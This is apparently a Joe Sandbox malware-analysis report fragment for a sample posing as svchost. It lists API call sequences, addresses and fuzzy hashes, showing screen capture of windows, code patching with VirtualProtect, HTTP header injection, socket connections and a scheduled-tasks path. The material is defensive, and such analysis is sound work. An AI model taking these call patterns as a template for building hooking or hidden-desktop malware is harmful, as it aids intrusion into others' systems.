                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Object$CompatibleCreateDeleteSelect$BitmapRelease
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2733039346-0
                                                                                                                                                                                                                • Opcode ID: 1650c12abe84ee58564dcde1c4c2d6c6f3976bfe68c698a62d604499912723e1
                                                                                                                                                                                                                • Instruction ID: a308955159820564f39df739a60e4b9ffa060d88bb13cc5ccbaec523535e55ba
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1650c12abe84ee58564dcde1c4c2d6c6f3976bfe68c698a62d604499912723e1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 111129B6D856109FC700CF68F98CEA637F8EB9D6107580954F48AC3301E6789CA5CB70
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,?,?,02D29CF9,00000000,?,?,?,?,02D291A0,?,?), ref: 02D299F1
                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000000,00000000), ref: 02D29A0F
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000,?,?,?,?,02D29CF9,00000000,?,?,?,?,02D291A0,?,?), ref: 02D29ADF
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000,?,?,?,?,02D29CF9,00000000,?,?,?,?,02D291A0,?,?), ref: 02D29B01
                                                                                                                                                                                                                • SendMessageA.USER32(?,0000E2AD,00000000,00000000), ref: 02D29B48
                                                                                                                                                                                                                • SendMessageW.USER32(?,?,00000003,00000000), ref: 02D29B6E
                                                                                                                                                                                                                • PostMessageW.USER32(?,00000101,?,?), ref: 02D29B7B
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message$MutexReleaseSend$ObjectPostSingleVirtualWait
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3783495248-0
                                                                                                                                                                                                                • Opcode ID: c1c5fad3d234af009e98d8c5ab8a631549b85c06fc2924f443b6d23c6814d1b9
                                                                                                                                                                                                                • Instruction ID: 62da3aa2c1669c6bd994e1f06b8c6866cd4ab4d293bce1faa79b75e23e2e3807
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c1c5fad3d234af009e98d8c5ab8a631549b85c06fc2924f443b6d23c6814d1b9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC512932A483A09ED721CF68E869BE53BD09B6632CF684589D8C2873C1C3798D5DD760
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsWindowVisible.USER32(02D2D04D), ref: 02D2C8DF
                                                                                                                                                                                                                • GetWindowInfo.USER32(02D2D04D,?), ref: 02D2C8F9
                                                                                                                                                                                                                • GetClassLongA.USER32(02D2D04D,000000E6), ref: 02D2C94E
                                                                                                                                                                                                                • PrintWindow.USER32(02D2D04D,?,00000000), ref: 02D2C967
                                                                                                                                                                                                                • BitBlt.GDI32(02D2CB32,?,?,?,?,75C0BCB0,00000000,00000000,00CC0020), ref: 02D2CA0E
                                                                                                                                                                                                                  • Part of subcall function 02D2DA30: GetClassNameA.USER32(?,?,00000101), ref: 02D2DA46
                                                                                                                                                                                                                  • Part of subcall function 02D2C700: SendMessageA.USER32(?,?,00000004,00000000), ref: 02D2C728
                                                                                                                                                                                                                  • Part of subcall function 02D2C700: GdiFlush.GDI32(00000000,?,?,75BF3EB0,?,?,?,02D290B9), ref: 02D2C73E
                                                                                                                                                                                                                  • Part of subcall function 02D2C700: BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 02D2C764
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$Class$FlushInfoLongMessageNamePrintSendVisible
                                                                                                                                                                                                                • String ID: <
                                                                                                                                                                                                                • API String ID: 2334662925-4251816714
                                                                                                                                                                                                                • Opcode ID: 04be2fcf1492e94c706d9bc2c14f1e22a1e77ac8b867cb3f3c82c621f942e430
                                                                                                                                                                                                                • Instruction ID: 20210a7588a024af31934c3216cb833a68304447c4a2b33965665de70e4a2cee
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 04be2fcf1492e94c706d9bc2c14f1e22a1e77ac8b867cb3f3c82c621f942e430
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B2416B71E14529AFCB14CF58C884BAEB7B6FF98349F66421AE405B3740D730AD59CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D25810
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D2583C
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D25863
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D25884
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000338,000003E8), ref: 02D258B4
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000338), ref: 02D258D5
                                                                                                                                                                                                                • SetLastError.KERNEL32(?), ref: 02D258EE
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: QueryVirtual$ErrorLast$MutexObjectReleaseSingleWait
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2971961948-0
                                                                                                                                                                                                                • Opcode ID: c81663f6603e00606336793fe1c5d451902e4b1204fe7fec22d85bc1b10f7112
                                                                                                                                                                                                                • Instruction ID: cb05b88caa9f56831eb5a3983e5a85e514916d9dfbaa165d9d7520a246d70111
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c81663f6603e00606336793fe1c5d451902e4b1204fe7fec22d85bc1b10f7112
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E941E675D40218EFDB44CFA8E885AADBBF5FB98314F90456AE904E7300E775AD05CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D30B23
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D30B4F
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D30B76
                                                                                                                                                                                                                • HttpAddRequestHeadersA.WININET(?,?,?,A0000000), ref: 02D30BBC
                                                                                                                                                                                                                • HttpAddRequestHeadersA.WININET(?,Accept-Encoding:,00000012,A0000000), ref: 02D30BCF
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: QueryVirtual$HeadersHttpRequest
                                                                                                                                                                                                                • String ID: Accept-Encoding:
                                                                                                                                                                                                                • API String ID: 853579731-3444961765
                                                                                                                                                                                                                • Opcode ID: cc2f040a6b5efc3fd58852453dbd0b9c8a0e6f011343d0ea91af4b23fd4b1df7
                                                                                                                                                                                                                • Instruction ID: 805e58b2f304f38b79dc1de66e4a7d7cdb1d05d543c80a95f84d09c2899aefab
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cc2f040a6b5efc3fd58852453dbd0b9c8a0e6f011343d0ea91af4b23fd4b1df7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A31FCB5D01209AFDB40DFA9D885AEEBBB9EF88314F50451AE914E3300E3706D41CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D30A13
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D30A3F
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D30A66
                                                                                                                                                                                                                • HttpAddRequestHeadersW.WININET(?,?,?,A0000000), ref: 02D30AAC
                                                                                                                                                                                                                • HttpAddRequestHeadersA.WININET(?,Accept-Encoding:,00000012,A0000000), ref: 02D30ABF
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: QueryVirtual$HeadersHttpRequest
                                                                                                                                                                                                                • String ID: Accept-Encoding:
                                                                                                                                                                                                                • API String ID: 853579731-3444961765
                                                                                                                                                                                                                • Opcode ID: 12d4609df475e6be82bfb37fecf8874e5e0a9e3211ff9f7bcd238e90d8fd8a40
                                                                                                                                                                                                                • Instruction ID: e03ed9dd29ef3bb1d41b81e8ae59994dfa5e22c6f31096620865b321b8448d57
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 12d4609df475e6be82bfb37fecf8874e5e0a9e3211ff9f7bcd238e90d8fd8a40
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DF31FBB5D41219AFDB40DFA9E885AEEBBB9EF58310F51412AE914E3300D370AD40CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D25918
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D25949
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D25975
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D2599C
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000338,000003E8), ref: 02D259CD
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000338), ref: 02D259EE
                                                                                                                                                                                                                • SetLastError.KERNEL32(?), ref: 02D259F8
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: QueryVirtual$ErrorLast$MutexObjectReleaseSingleWait
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2971961948-0
                                                                                                                                                                                                                • Opcode ID: 84cda661cf541ee3998bbab42de962eaa88767b02a1eb021b6696fd7ea964623
                                                                                                                                                                                                                • Instruction ID: 69f3cf0efb798fa4c831efc6ab1a9573a06768281983550c1615e44e6a55d9a6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84cda661cf541ee3998bbab42de962eaa88767b02a1eb021b6696fd7ea964623
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A231E5B5E40218AFDB40CFA8E885AADBBF5FB58310F90856AE508E7300E7755D558FA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D2B96F
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D2B99B
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D2B9C2
                                                                                                                                                                                                                • GetUserObjectInformationA.USER32(?,00000002,?,00000100,?), ref: 02D2B9F1
                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(?,a1633b6ba), ref: 02D2BA07
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: QueryVirtual$InformationObjectUserlstrcmpi
                                                                                                                                                                                                                • String ID: a1633b6ba
                                                                                                                                                                                                                • API String ID: 410342393-2535263190
                                                                                                                                                                                                                • Opcode ID: 1006249fc51fbb31b561190a4c532f974995944dbd5295462e9a300830251fa8
                                                                                                                                                                                                                • Instruction ID: 1a3e80c05d2274b53c4749dfc49c923f0653172982eaf0c2832d50a84bffe6e8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1006249fc51fbb31b561190a4c532f974995944dbd5295462e9a300830251fa8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD311EB1D1021DAFDB40CFA9D885AEEBBF4FB58304F50806AE515E7200E7B55A44CFA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5E8DC08D), ref: 02D3BAE7
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0001C350,02D7A080,00000000,00000000), ref: 02D3BB80
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D3BB98
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D3BBA9
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$BackslashCloseCreateInformationPathThread
                                                                                                                                                                                                                • String ID: 5E8DC08D$keys
                                                                                                                                                                                                                • API String ID: 3186380484-1946552345
                                                                                                                                                                                                                • Opcode ID: 93d5e42cb9eaeb9a58a5a570abbabf331c4d7f61f47d73ddd133981b7c650e25
                                                                                                                                                                                                                • Instruction ID: c7eaa158ccccdc5d4f71ffc7aa8ec1b0d7acf127fedfcdff2409b93eaf2a6fd5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 93d5e42cb9eaeb9a58a5a570abbabf331c4d7f61f47d73ddd133981b7c650e25
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 022128309052495FDB228B64E8287EE7BE4EF49748F2444C6E885E7340EF719D48C7A4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000003E8), ref: 02D3A2CB
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(?,00000018,00000040,?), ref: 02D3A318
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 02D3A347
                                                                                                                                                                                                                • FlushInstructionCache.KERNEL32(00000000), ref: 02D3A34E
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(?,00000018,?,?), ref: 02D3A362
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(?), ref: 02D3A379
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02D3A381
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ProtectVirtual$CacheCurrentFlushInstructionMutexObjectProcessReleaseSingleSleepWait
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 842647815-0
                                                                                                                                                                                                                • Opcode ID: 2a49b86af9ad83d6d89970286432b877b567e4d3e0cfeda8082f3c8ee463941f
                                                                                                                                                                                                                • Instruction ID: 5421805c7bf04fcc7e272e98f4ed3147acdb819049ad7dc100cee0f97b635c34
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a49b86af9ad83d6d89970286432b877b567e4d3e0cfeda8082f3c8ee463941f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C210A75A40701EFD718CF54E988E5AB7A5FF48700F118908EA8A5B790CB74FD54CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • htons.WS2_32(?), ref: 02D50E74
                                                                                                                                                                                                                • inet_addr.WS2_32(?), ref: 02D50E7F
                                                                                                                                                                                                                • htonl.WS2_32(000000FF), ref: 02D50E8A
                                                                                                                                                                                                                • gethostbyname.WS2_32(?), ref: 02D50E96
                                                                                                                                                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 02D50EB0
                                                                                                                                                                                                                • connect.WS2_32(00000000,?,00000010), ref: 02D50EC3
                                                                                                                                                                                                                • closesocket.WS2_32(00000000), ref: 02D50ECE
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: closesocketconnectgethostbynamehtonlhtonsinet_addrsocket
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 298246419-0
                                                                                                                                                                                                                • Opcode ID: 3217eb05137bcef32e880bedbf85a4b0162b16ffd6dea7ae1b87405ee62a9aae
                                                                                                                                                                                                                • Instruction ID: 5d288c134242fa0ed65adea444d95526e5d2a171af2970e8c549daf49df6ec90
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3217eb05137bcef32e880bedbf85a4b0162b16ffd6dea7ae1b87405ee62a9aae
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB11B431A50218AFDB00DFA8EC4DB9EB7A9FF49311F804669FD11A7390D7709C508BA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D2D690,00000000,00000000,00000000), ref: 02D2D6D4
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000,?,?,02D29B2A,?,?,?,?,02D29CF9,00000000,?,?,?,?,02D291A0), ref: 02D2D6EC
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,02D29B2A,?,?,?,?,02D29CF9,00000000,?,?,?,?,02D291A0,?), ref: 02D2D6FD
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,02D29B2A,?,?,?,?,02D29CF9,00000000,?,?,?,?,02D291A0), ref: 02D2D70C
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D2D740
                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 02D2D747
                                                                                                                                                                                                                • PostMessageA.USER32(?,00000215,00000000,00000000), ref: 02D2D75B
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$CloseCreateInformationMessageMutexObjectPostReleaseSingleThreadWaitWindow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 731183410-0
                                                                                                                                                                                                                • Opcode ID: 6f8cce3e2e680c5b598e3d60b1e63d9173a6d421386b47cdb7927a320163b4b9
                                                                                                                                                                                                                • Instruction ID: 213c556329abb0a04926eb92a8b3c44f1d66f2c2a6c8423b499c891d20707eb1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f8cce3e2e680c5b598e3d60b1e63d9173a6d421386b47cdb7927a320163b4b9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 88118230A84324ABE3109F50EC0DF9A37A8AF15719F644690F906AB3C0D7B45D54CBA4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 00403337
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403359
                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403360
                                                                                                                                                                                                                • GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403381
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00403397
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • \\?\globalroot\systemroot\system32\tasks\, xrefs: 00403319
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ProcessToken$CloseCurrentHandleInformationOpenVersion
                                                                                                                                                                                                                • String ID: \\?\globalroot\systemroot\system32\tasks\
                                                                                                                                                                                                                • API String ID: 4133869067-1576788796
                                                                                                                                                                                                                • Opcode ID: 76f7c13d41ba4f40b5ff24f9cac2bfcc18b58a5216b2a1f5173a808488ca33cd
                                                                                                                                                                                                                • Instruction ID: 49b559ea0f9bb78937d1c0884117093763843d0ff56e3b8f35a0dc65749093db
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 76f7c13d41ba4f40b5ff24f9cac2bfcc18b58a5216b2a1f5173a808488ca33cd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E60165B5A00208EBEB20DFA4DD4DB9F7B7CAB44715F0080A6EA05B2280DA749B44DF64
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 02D2C2A8
                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 02D2C2B7
                                                                                                                                                                                                                • Sleep.KERNEL32(00000000), ref: 02D2C30F
                                                                                                                                                                                                                  • Part of subcall function 02D2C220: GetWindowInfo.USER32(?,?), ref: 02D2C254
                                                                                                                                                                                                                  • Part of subcall function 02D2C220: SetWindowLongA.USER32(?,000000EC,?), ref: 02D2C276
                                                                                                                                                                                                                  • Part of subcall function 02D2C220: SetLayeredWindowAttributes.USER32(?,0000FFFF,000000FF,00000002), ref: 02D2C289
                                                                                                                                                                                                                • GetClassLongA.USER32(?,000000E6), ref: 02D2C2D0
                                                                                                                                                                                                                • SetClassLongA.USER32(?,000000E6,00000000), ref: 02D2C2E3
                                                                                                                                                                                                                • SendMessageA.USER32(?,000000D2,00000000,00000000), ref: 02D2C2FA
                                                                                                                                                                                                                • SendMessageA.USER32(?,000000CC,00000000,00000000), ref: 02D2C30A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$Long$ClassMessageSend$AttributesInfoLayeredProcessSleepThreadVisible
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 923153955-0
                                                                                                                                                                                                                • Opcode ID: 4fb41a538cd7cbcbeda19568bd5cdae6293a36bff16af7cac0f01caf4ed9baef
                                                                                                                                                                                                                • Instruction ID: 7497eaf880609d7dbfc8156d089dae77f3a5494ea83f61346fe9694b990ffcc5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4fb41a538cd7cbcbeda19568bd5cdae6293a36bff16af7cac0f01caf4ed9baef
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 890144326902247BE3202B54FC0DFDE371C9F62BA5F400202F640BA3C0CBA4AD91C6B9
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • shutdown.WS2_32(?,00000001), ref: 02D393BB
